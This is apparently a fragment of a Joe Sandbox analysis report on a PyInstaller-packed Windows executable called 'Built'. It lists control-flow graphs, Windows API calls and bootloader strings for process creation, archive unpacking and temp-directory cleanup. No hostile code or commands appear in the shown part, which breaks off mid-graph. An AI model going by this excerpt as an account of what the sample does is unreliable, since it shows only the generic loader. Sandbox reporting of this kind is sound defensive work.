7ff62665916f 19941->19942 19945 7ff62665919b 19941->19945 19946 7ff6266591b4 19941->19946 19944 7ff62665a9b8 __free_lconv_mon 11 API calls 19942->19944 19943->19928 19944->19928 19947 7ff62665a9b8 __free_lconv_mon 11 API calls 19945->19947 19949 7ff62665a9b8 __free_lconv_mon 11 API calls 19946->19949 19948 7ff6266591a4 19947->19948 19950 7ff62665a9b8 __free_lconv_mon 11 API calls 19948->19950 19949->19942 19950->19928 19953 7ff62664d046 19952->19953 19955 7ff62664d03f 19952->19955 19956 7ff62665a25c 19953->19956 19955->19926 19959 7ff626659e98 19956->19959 19966 7ff626660348 EnterCriticalSection 19959->19966 19968 7ff62665903c 19967->19968 19972 7ff626659074 19967->19972 19969 7ff62665ec08 _get_daylight 11 API calls 19968->19969 19968->19972 19970 7ff62665906a 19969->19970 19971 7ff62665a9b8 __free_lconv_mon 11 API calls 19970->19971 19971->19972 19972->19938 19972->19941 19976 7ff626659dc0 19979 7ff626659d3c 19976->19979 19986 7ff626660348 EnterCriticalSection 19979->19986 20141 7ff62665b040 20142 7ff62665b045 20141->20142 20143 7ff62665b05a 20141->20143 20147 7ff62665b060 20142->20147 20148 7ff62665b0a2 20147->20148 20149 7ff62665b0aa 20147->20149 20151 7ff62665a9b8 __free_lconv_mon 11 API calls 20148->20151 20150 7ff62665a9b8 __free_lconv_mon 11 API calls 20149->20150 20152 7ff62665b0b7 20150->20152 20151->20149 20153 7ff62665a9b8 __free_lconv_mon 11 API calls 20152->20153 20154 7ff62665b0c4 20153->20154 20155 7ff62665a9b8 __free_lconv_mon 11 API calls 20154->20155 20156 7ff62665b0d1 20155->20156 20157 7ff62665a9b8 __free_lconv_mon 11 API calls 20156->20157 20158 7ff62665b0de 20157->20158 20159 7ff62665a9b8 __free_lconv_mon 11 API calls 20158->20159 20160 7ff62665b0eb 20159->20160 20161 7ff62665a9b8 __free_lconv_mon 11 API calls 20160->20161 20162 7ff62665b0f8 20161->20162 20163 7ff62665a9b8 __free_lconv_mon 11 API calls 20162->20163 20164 7ff62665b105 20163->20164 20165 7ff62665a9b8 __free_lconv_mon 11 API calls 20164->20165 20166 7ff62665b115 20165->20166 20167 7ff62665a9b8 __free_lconv_mon 11 API calls 20166->20167 20168 7ff62665b125 20167->20168 20173 7ff62665af04 20168->20173 20187 7ff626660348 EnterCriticalSection 20173->20187

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ff626648bd0-7ff626648d16 call 7ff62664c8c0 call 7ff626649400 SetConsoleCtrlHandler GetStartupInfoW call 7ff626655460 call 7ff62665a4ec call 7ff62665878c call 7ff626655460 call 7ff62665a4ec call 7ff62665878c call 7ff626655460 call 7ff62665a4ec call 7ff62665878c GetCommandLineW CreateProcessW 23 7ff626648d3d-7ff626648d79 RegisterClassW 0->23 24 7ff626648d18-7ff626648d38 GetLastError call 7ff626642c50 0->24 26 7ff626648d7b GetLastError 23->26 27 7ff626648d81-7ff626648dd5 CreateWindowExW 23->27 31 7ff626649029-7ff62664904f call 7ff62664c5c0 24->31 26->27 29 7ff626648dd7-7ff626648ddd GetLastError 27->29 30 7ff626648ddf-7ff626648de4 ShowWindow 27->30 32 7ff626648dea-7ff626648dfa WaitForSingleObject 29->32 30->32 34 7ff626648dfc 32->34 35 7ff626648e78-7ff626648e7f 32->35 39 7ff626648e00-7ff626648e03 34->39 36 7ff626648ec2-7ff626648ec9 35->36 37 7ff626648e81-7ff626648e91 WaitForSingleObject 35->37 42 7ff626648ecf-7ff626648ee5 QueryPerformanceFrequency QueryPerformanceCounter 36->42 43 7ff626648fb0-7ff626648fc9 GetMessageW 36->43 40 7ff626648e97-7ff626648ea7 TerminateProcess 37->40 41 7ff626648fe8-7ff626648ff2 37->41 44 7ff626648e0b-7ff626648e12 39->44 45 7ff626648e05 GetLastError 39->45 48 7ff626648ea9 GetLastError 40->48 49 7ff626648eaf-7ff626648ebd WaitForSingleObject 40->49 46 7ff626648ff4-7ff626648ffa DestroyWindow 41->46 47 7ff626649001-7ff626649025 GetExitCodeProcess CloseHandle * 2 41->47 50 7ff626648ef0-7ff626648f28 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff626648fcb-7ff626648fd9 TranslateMessage DispatchMessageW 43->52 53 7ff626648fdf-7ff626648fe6 43->53 44->37 51 7ff626648e14-7ff626648e31 PeekMessageW 44->51 45->44 46->47 47->31 48->49 49->41 54 7ff626648f2a 50->54 55 7ff626648f63-7ff626648f6a 50->55 56 7ff626648e66-7ff626648e76 WaitForSingleObject 51->56 57 7ff626648e33-7ff626648e64 TranslateMessage DispatchMessageW PeekMessageW 51->57 52->53 53->41 53->43 58 7ff626648f30-7ff626648f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->43 59 7ff626648f6c-7ff626648f95 QueryPerformanceCounter 55->59 56->35 56->39 57->56 57->57 58->55 58->58 59->50 60 7ff626648f9b-7ff626648fa2 59->60 60->41 61 7ff626648fa4-7ff626648fa8 60->61 61->43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                              • API String ID: 3832162212-3165540532
                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                              • Instruction ID: 49114583f7f9625af0ff0251d2200d444366a34717454b278500218c095fc9e7
                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                              • Instruction Fuzzy Hash: 35D19E32A08A8386EF209F34EC542A97764FB84B58F400239DA5D93AA8DF3DD554DB43

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 62 7ff626641000-7ff626643806 call 7ff62664fe88 call 7ff62664fe90 call 7ff62664c8c0 call 7ff626655460 call 7ff6266554f4 call 7ff6266436b0 76 7ff626643808-7ff62664380f 62->76 77 7ff626643814-7ff626643836 call 7ff626641950 62->77 78 7ff626643c97-7ff626643cb2 call 7ff62664c5c0 76->78 83 7ff62664383c-7ff626643856 call 7ff626641c80 77->83 84 7ff62664391b-7ff626643931 call 7ff6266445b0 77->84 88 7ff62664385b-7ff62664389b call 7ff626648a20 83->88 89 7ff62664396a-7ff62664397f call 7ff626642710 84->89 90 7ff626643933-7ff626643960 call 7ff626647f80 84->90 95 7ff62664389d-7ff6266438a3 88->95 96 7ff6266438c1-7ff6266438cc call 7ff626654fa0 88->96 104 7ff626643c8f 89->104 102 7ff626643984-7ff6266439a6 call 7ff626641c80 90->102 103 7ff626643962-7ff626643965 call 7ff6266500bc 90->103 99 7ff6266438af-7ff6266438bd call 7ff626648b90 95->99 100 7ff6266438a5-7ff6266438ad 95->100 110 7ff6266439fc-7ff626643a2a call 7ff626648b30 call 7ff626648b90 * 3 96->110 111 7ff6266438d2-7ff6266438e1 call 7ff626648a20 96->111 99->96 100->99 113 7ff6266439b0-7ff6266439b9 102->113 103->89 104->78 138 7ff626643a2f-7ff626643a3e call 7ff626648a20 110->138 120 7ff6266438e7-7ff6266438ed 111->120 121 7ff6266439f4-7ff6266439f7 call 7ff626654fa0 111->121 113->113 116 7ff6266439bb-7ff6266439d8 call 7ff626641950 113->116 116->88 127 7ff6266439de-7ff6266439ef call 7ff626642710 116->127 125 7ff6266438f0-7ff6266438fc 120->125 121->110 128 7ff6266438fe-7ff626643903 125->128 129 7ff626643905-7ff626643908 125->129 127->104 128->125 128->129 129->121 132 7ff62664390e-7ff626643916 call 7ff626654fa0 129->132 132->138 141 7ff626643b45-7ff626643b53 138->141 142 7ff626643a44-7ff626643a47 138->142 144 7ff626643b59-7ff626643b5d 141->144 145 7ff626643a67 141->145 142->141 143 7ff626643a4d-7ff626643a50 142->143 146 7ff626643a56-7ff626643a5a 143->146 147 7ff626643b14-7ff626643b17 143->147 148 7ff626643a6b-7ff626643a90 call 7ff626654fa0 144->148 145->148 146->147 149 7ff626643a60 146->149 150 7ff626643b19-7ff626643b1d 147->150 151 7ff626643b2f-7ff626643b40 call 7ff626642710 147->151 157 7ff626643aab-7ff626643ac0 148->157 158 7ff626643a92-7ff626643aa6 call 7ff626648b30 148->158 149->145 150->151 153 7ff626643b1f-7ff626643b2a 150->153 159 7ff626643c7f-7ff626643c87 151->159 153->148 161 7ff626643be8-7ff626643bfa call 7ff626648a20 157->161 162 7ff626643ac6-7ff626643aca 157->162 158->157 159->104 169 7ff626643bfc-7ff626643c02 161->169 170 7ff626643c2e 161->170 163 7ff626643bcd-7ff626643be2 call 7ff626641940 162->163 164 7ff626643ad0-7ff626643ae8 call 7ff6266552c0 162->164 163->161 163->162 175 7ff626643aea-7ff626643b02 call 7ff6266552c0 164->175 176 7ff626643b62-7ff626643b7a call 7ff6266552c0 164->176 173 7ff626643c1e-7ff626643c2c 169->173 174 7ff626643c04-7ff626643c1c 169->174 177 7ff626643c31-7ff626643c40 call 7ff626654fa0 170->177 173->177 174->177 175->163 186 7ff626643b08-7ff626643b0f 175->186 184 7ff626643b87-7ff626643b9f call 7ff6266552c0 176->184 185 7ff626643b7c-7ff626643b80 176->185 187 7ff626643c46-7ff626643c4a 177->187 188 7ff626643d41-7ff626643d63 call 7ff6266444d0 177->188 197 7ff626643bac-7ff626643bc4 call 7ff6266552c0 184->197 198 7ff626643ba1-7ff626643ba5 184->198 185->184 186->163 190 7ff626643c50-7ff626643c5f call 7ff6266490e0 187->190 191 7ff626643cd4-7ff626643ce6 call 7ff626648a20 187->191 201 7ff626643d71-7ff626643d82 call 7ff626641c80 188->201 202 7ff626643d65-7ff626643d6f call 7ff626644620 188->202 205 7ff626643c61 190->205 206 7ff626643cb3-7ff626643cb6 call 7ff626648850 190->206 207 7ff626643ce8-7ff626643ceb 191->207 208 7ff626643d35-7ff626643d3c 191->208 197->163 219 7ff626643bc6 197->219 198->197 210 7ff626643d87-7ff626643d96 201->210 202->210 213 7ff626643c68 call 7ff626642710 205->213 218 7ff626643cbb-7ff626643cbd 206->218 207->208 214 7ff626643ced-7ff626643d10 call 7ff626641c80 207->214 208->213 216 7ff626643d98-7ff626643d9f 210->216 217 7ff626643dc4-7ff626643dda call 7ff626649400 210->217 227 7ff626643c6d-7ff626643c77 213->227 228 7ff626643d2b-7ff626643d33 call 7ff626654fa0 214->228 229 7ff626643d12-7ff626643d26 call 7ff626642710 call 7ff626654fa0 214->229 216->217 223 7ff626643da1-7ff626643da5 216->223 234 7ff626643de8-7ff626643e04 SetDllDirectoryW 217->234 235 7ff626643ddc 217->235 225 7ff626643cc8-7ff626643ccf 218->225 226 7ff626643cbf-7ff626643cc6 218->226 219->163 223->217 230 7ff626643da7-7ff626643dbe SetDllDirectoryW LoadLibraryExW 223->230 225->210 226->213 227->159 228->210 229->227 230->217 238 7ff626643e0a-7ff626643e19 call 7ff626648a20 234->238 239 7ff626643f01-7ff626643f08 234->239 235->234 251 7ff626643e1b-7ff626643e21 238->251 252 7ff626643e32-7ff626643e3c call 7ff626654fa0 238->252 241 7ff626643ffc-7ff626644004 239->241 242 7ff626643f0e-7ff626643f15 239->242 246 7ff626644029-7ff62664405b call 7ff6266436a0 call 7ff626643360 call 7ff626643670 call 7ff626646fb0 call 7ff626646d60 241->246 247 7ff626644006-7ff626644023 PostMessageW GetMessageW 241->247 242->241 245 7ff626643f1b-7ff626643f25 call 7ff6266433c0 242->245 245->227 259 7ff626643f2b-7ff626643f3f call 7ff6266490c0 245->259 247->246 253 7ff626643e2d-7ff626643e2f 251->253 254 7ff626643e23-7ff626643e2b 251->254 261 7ff626643ef2-7ff626643efc call 7ff626648b30 252->261 262 7ff626643e42-7ff626643e48 252->262 253->252 254->253 272 7ff626643f41-7ff626643f5e PostMessageW GetMessageW 259->272 273 7ff626643f64-7ff626643fa0 call 7ff626648b30 call 7ff626648bd0 call 7ff626646fb0 call 7ff626646d60 call 7ff626648ad0 259->273 261->239 262->261 266 7ff626643e4e-7ff626643e54 262->266 270 7ff626643e56-7ff626643e58 266->270 271 7ff626643e5f-7ff626643e61 266->271 276 7ff626643e67-7ff626643e83 call 7ff626646db0 call 7ff626647330 270->276 277 7ff626643e5a 270->277 271->239 271->276 272->273 308 7ff626643fa5-7ff626643fa7 273->308 290 7ff626643e8e-7ff626643e95 276->290 291 7ff626643e85-7ff626643e8c 276->291 277->239 293 7ff626643e97-7ff626643ea4 call 7ff626646df0 290->293 294 7ff626643eaf-7ff626643eb9 call 7ff6266471a0 290->294 292 7ff626643edb-7ff626643ef0 call 7ff626642a50 call 7ff626646fb0 call 7ff626646d60 291->292 292->239 293->294 305 7ff626643ea6-7ff626643ead 293->305 306 7ff626643ebb-7ff626643ec2 294->306 307 7ff626643ec4-7ff626643ed2 call 7ff6266474e0 294->307 305->292 306->292 307->239 319 7ff626643ed4 307->319 311 7ff626643fe9-7ff626643ff7 call 7ff626641900 308->311 312 7ff626643fa9-7ff626643fb3 call 7ff626649200 308->312 311->227 312->311 321 7ff626643fb5-7ff626643fca 312->321 319->292 322 7ff626643fcc-7ff626643fdf call 7ff626642710 call 7ff626641900 321->322 323 7ff626643fe4 call 7ff626642a50 321->323 322->227 323->311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                              • API String ID: 2776309574-3273434969
                                                              • Opcode ID: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
                                                              • Instruction ID: a0bc54d492fb74ba83bbc9bbfa4fd83e747064c75617aab85271ba1dba420f5f
                                                              • Opcode Fuzzy Hash: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
                                                              • Instruction Fuzzy Hash: 00329F21A0CA8391FE359B22EC653B96751BF84740F484032DA5DD32D6EFAEE554EB03

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 536 7ff6266669d4-7ff626666a47 call 7ff626666708 539 7ff626666a49-7ff626666a52 call 7ff626654f58 536->539 540 7ff626666a61-7ff626666a6b call 7ff626658590 536->540 545 7ff626666a55-7ff626666a5c call 7ff626654f78 539->545 546 7ff626666a6d-7ff626666a84 call 7ff626654f58 call 7ff626654f78 540->546 547 7ff626666a86-7ff626666aef CreateFileW 540->547 560 7ff626666da2-7ff626666dc2 545->560 546->545 548 7ff626666b6c-7ff626666b77 GetFileType 547->548 549 7ff626666af1-7ff626666af7 547->549 555 7ff626666bca-7ff626666bd1 548->555 556 7ff626666b79-7ff626666bb4 GetLastError call 7ff626654eec CloseHandle 548->556 552 7ff626666b39-7ff626666b67 GetLastError call 7ff626654eec 549->552 553 7ff626666af9-7ff626666afd 549->553 552->545 553->552 558 7ff626666aff-7ff626666b37 CreateFileW 553->558 563 7ff626666bd9-7ff626666bdc 555->563 564 7ff626666bd3-7ff626666bd7 555->564 556->545 571 7ff626666bba-7ff626666bc5 call 7ff626654f78 556->571 558->548 558->552 565 7ff626666be2-7ff626666c37 call 7ff6266584a8 563->565 566 7ff626666bde 563->566 564->565 574 7ff626666c56-7ff626666c87 call 7ff626666488 565->574 575 7ff626666c39-7ff626666c45 call 7ff626666910 565->575 566->565 571->545 582 7ff626666c8d-7ff626666ccf 574->582 583 7ff626666c89-7ff626666c8b 574->583 575->574 581 7ff626666c47 575->581 586 7ff626666c49-7ff626666c51 call 7ff62665ab30 581->586 584 7ff626666cf1-7ff626666cfc 582->584 585 7ff626666cd1-7ff626666cd5 582->585 583->586 588 7ff626666d02-7ff626666d06 584->588 589 7ff626666da0 584->589 585->584 587 7ff626666cd7-7ff626666cec 585->587 586->560 587->584 588->589 591 7ff626666d0c-7ff626666d51 CloseHandle CreateFileW 588->591 589->560 593 7ff626666d86-7ff626666d9b 591->593 594 7ff626666d53-7ff626666d81 GetLastError call 7ff626654eec call 7ff6266586d0 591->594 593->589 594->593
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                              • Instruction ID: 2a4b239bc42938db0c29a043dfb3ae7c8c225f3b66a64ed84993c92f0486f759
                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                              • Instruction Fuzzy Hash: 71C1B132B28A4286EF10CF69E8912AC3761FB49B98F115225DE2ED7795CF3ED411D702

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664841B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664849E
                                                              • DeleteFileW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484BD
                                                              • FindNextFileW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484CB
                                                              • FindClose.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484DC
                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                              • Instruction ID: 466e76af0ee52c08d8733a8b641580a35883307bcb1a5e1f87eab11825cf6532
                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                              • Instruction Fuzzy Hash: 9A419121A0CA8395EE309B25EC641B96364FB94794F800236D69DC36C4DF7ED54ADF43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                              • Instruction ID: 591a331624e7a7add791163fc94b0685481a0cfaa248aeb4fc6dfbffb7cda6ac
                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                              • Instruction Fuzzy Hash: B1F0A422A18642C6FB708B60B85876A6350BB85338F040335D96D426D4DF7DD4589F02

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 329 7ff626641950-7ff62664198b call 7ff6266445b0 332 7ff626641991-7ff6266419d1 call 7ff626647f80 329->332 333 7ff626641c4e-7ff626641c72 call 7ff62664c5c0 329->333 338 7ff6266419d7-7ff6266419e7 call 7ff626650744 332->338 339 7ff626641c3b-7ff626641c3e call 7ff6266500bc 332->339 344 7ff6266419e9-7ff626641a03 call 7ff626654f78 call 7ff626642910 338->344 345 7ff626641a08-7ff626641a24 call 7ff62665040c 338->345 343 7ff626641c43-7ff626641c4b 339->343 343->333 344->339 351 7ff626641a26-7ff626641a40 call 7ff626654f78 call 7ff626642910 345->351 352 7ff626641a45-7ff626641a5a call 7ff626654f98 345->352 351->339 358 7ff626641a5c-7ff626641a76 call 7ff626654f78 call 7ff626642910 352->358 359 7ff626641a7b-7ff626641afc call 7ff626641c80 * 2 call 7ff626650744 352->359 358->339 371 7ff626641b01-7ff626641b14 call 7ff626654fb4 359->371 374 7ff626641b16-7ff626641b30 call 7ff626654f78 call 7ff626642910 371->374 375 7ff626641b35-7ff626641b4e call 7ff62665040c 371->375 374->339 381 7ff626641b50-7ff626641b6a call 7ff626654f78 call 7ff626642910 375->381 382 7ff626641b6f-7ff626641b8b call 7ff626650180 375->382 381->339 388 7ff626641b8d-7ff626641b99 call 7ff626642710 382->388 389 7ff626641b9e-7ff626641bac 382->389 388->339 389->339 392 7ff626641bb2-7ff626641bb9 389->392 395 7ff626641bc1-7ff626641bc7 392->395 396 7ff626641bc9-7ff626641bd6 395->396 397 7ff626641be0-7ff626641bef 395->397 398 7ff626641bf1-7ff626641bfa 396->398 397->397 397->398 399 7ff626641bfc-7ff626641bff 398->399 400 7ff626641c0f 398->400 399->400 402 7ff626641c01-7ff626641c04 399->402 401 7ff626641c11-7ff626641c24 400->401 403 7ff626641c26 401->403 404 7ff626641c2d-7ff626641c39 401->404 402->400 405 7ff626641c06-7ff626641c09 402->405 403->404 404->339 404->395 405->400 406 7ff626641c0b-7ff626641c0d 405->406 406->401
                                                              APIs
                                                                • Part of subcall function 00007FF626647F80: _fread_nolock.LIBCMT ref: 00007FF62664802A
                                                              • _fread_nolock.LIBCMT ref: 00007FF626641A1B
                                                                • Part of subcall function 00007FF626642910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock$CurrentProcess
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 2397952137-3497178890
                                                              • Opcode ID: ec026736a1cabb0f7ef6b5c1934254d4a8a5e9b6eedc37d057a3adc814f85b90
                                                              • Instruction ID: 721ca4d310a3b0555481ed9d439471ffb16e80f0896e4e527ae070d2dbcd9d4e
                                                              • Opcode Fuzzy Hash: ec026736a1cabb0f7ef6b5c1934254d4a8a5e9b6eedc37d057a3adc814f85b90
                                                              • Instruction Fuzzy Hash: 81819071A0C68786EF20DB24E8612B963A0FF84784F404031D98DD7B86DE7EE585AF43

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 407 7ff626641600-7ff626641611 408 7ff626641637-7ff626641651 call 7ff6266445b0 407->408 409 7ff626641613-7ff62664161c call 7ff626641050 407->409 416 7ff626641653-7ff626641681 call 7ff626654f78 call 7ff626642910 408->416 417 7ff626641682-7ff62664169c call 7ff6266445b0 408->417 414 7ff62664162e-7ff626641636 409->414 415 7ff62664161e-7ff626641629 call 7ff626642710 409->415 415->414 424 7ff6266416b8-7ff6266416cf call 7ff626650744 417->424 425 7ff62664169e-7ff6266416b3 call 7ff626642710 417->425 432 7ff6266416f9-7ff6266416fd 424->432 433 7ff6266416d1-7ff6266416f4 call 7ff626654f78 call 7ff626642910 424->433 431 7ff626641821-7ff626641824 call 7ff6266500bc 425->431 440 7ff626641829-7ff62664183b 431->440 434 7ff626641717-7ff626641737 call 7ff626654fb4 432->434 435 7ff6266416ff-7ff62664170b call 7ff626641210 432->435 445 7ff626641819-7ff62664181c call 7ff6266500bc 433->445 446 7ff626641739-7ff62664175c call 7ff626654f78 call 7ff626642910 434->446 447 7ff626641761-7ff62664176c 434->447 442 7ff626641710-7ff626641712 435->442 442->445 445->431 460 7ff62664180f-7ff626641814 446->460 451 7ff626641802-7ff62664180a call 7ff626654fa0 447->451 452 7ff626641772-7ff626641777 447->452 451->460 455 7ff626641780-7ff6266417a2 call 7ff62665040c 452->455 462 7ff6266417da-7ff6266417e6 call 7ff626654f78 455->462 463 7ff6266417a4-7ff6266417bc call 7ff626650b4c 455->463 460->445 470 7ff6266417ed-7ff6266417f8 call 7ff626642910 462->470 468 7ff6266417be-7ff6266417c1 463->468 469 7ff6266417c5-7ff6266417d8 call 7ff626654f78 463->469 468->455 471 